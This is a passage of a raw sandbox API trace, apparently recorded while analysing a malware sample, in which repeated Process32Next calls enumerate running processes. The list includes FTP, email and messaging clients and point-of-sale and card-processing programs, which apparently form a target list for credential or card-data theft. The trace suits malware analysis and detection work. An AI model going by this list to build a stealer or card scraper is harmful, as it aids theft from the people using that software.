lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.699] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.740] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0216.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0216.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.744] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.746] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.748] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.750] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.751] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.753] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.754] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0216.756] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0216.758] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0216.759] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0216.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0216.762] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0216.764] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0216.766] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0216.767] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0216.769] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0216.770] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0216.772] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0216.773] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0216.818] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0216.820] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0216.822] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0216.824] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0216.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0216.827] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0216.834] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0216.835] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0216.837] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0216.842] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0216.844] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0216.847] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0216.849] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0216.851] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0216.853] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0216.855] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0216.858] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0216.860] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0216.982] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0216.984] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0216.987] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.028] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.030] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.032] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.034] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.036] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.038] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.039] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.045] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.047] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.049] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.050] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.052] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.055] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.057] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.114] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.116] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.120] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.124] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.126] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.128] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.130] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.131] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.133] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.136] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.138] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0217.144] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0217.146] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0217.148] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.188] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.190] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0217.192] Process32Next (in: hSnapshot=0x1eb8, 